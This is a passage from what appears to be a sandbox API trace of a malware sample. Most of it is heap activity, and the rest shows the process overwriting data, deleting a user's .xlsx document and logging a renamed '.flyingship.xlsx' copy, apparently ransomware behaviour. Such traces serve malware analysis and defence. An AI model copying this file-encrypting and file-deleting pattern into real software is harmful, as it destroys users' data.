Flags=0x0, Size=0x10) returned 0x9b9b50 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0176.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0176.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.117] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba378, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0176.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.118] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0176.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.119] WriteFile (in: hFile=0x120, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0x111a6, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0x111a6, lpOverlapped=0x0) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0176.120] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0176.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.121] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.121] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0176.121] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.121] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.123] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFilePart=0x0) returned 0x3e [0176.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0xe558b00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0x90af58 [0176.125] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oshjnd6e0l0zqq8nt.xlsx")) returned 1 [0176.134] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0xe558b00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 0 [0176.134] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.134] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.135] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.135] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.135] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.154] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.155] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.155] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.156] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.157] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0176.157] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.157] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0176.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.158] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0176.158] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x1523, lpOverlapped=0x0) returned 1 [0176.158] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0176.158] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1523, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.158] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0176.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0176.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0176.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4c) returned 0x923b28 [0176.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\n", cchWideChar=76, lpMultiByteStr=0x923b28, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\n", lpUsedDefaultChar=0x0) returned 76 [0176.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0176.159] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4b, lpOverlapped=0x0) returned 1 [0176.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.159] CloseHandle (hObject=0x120) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: 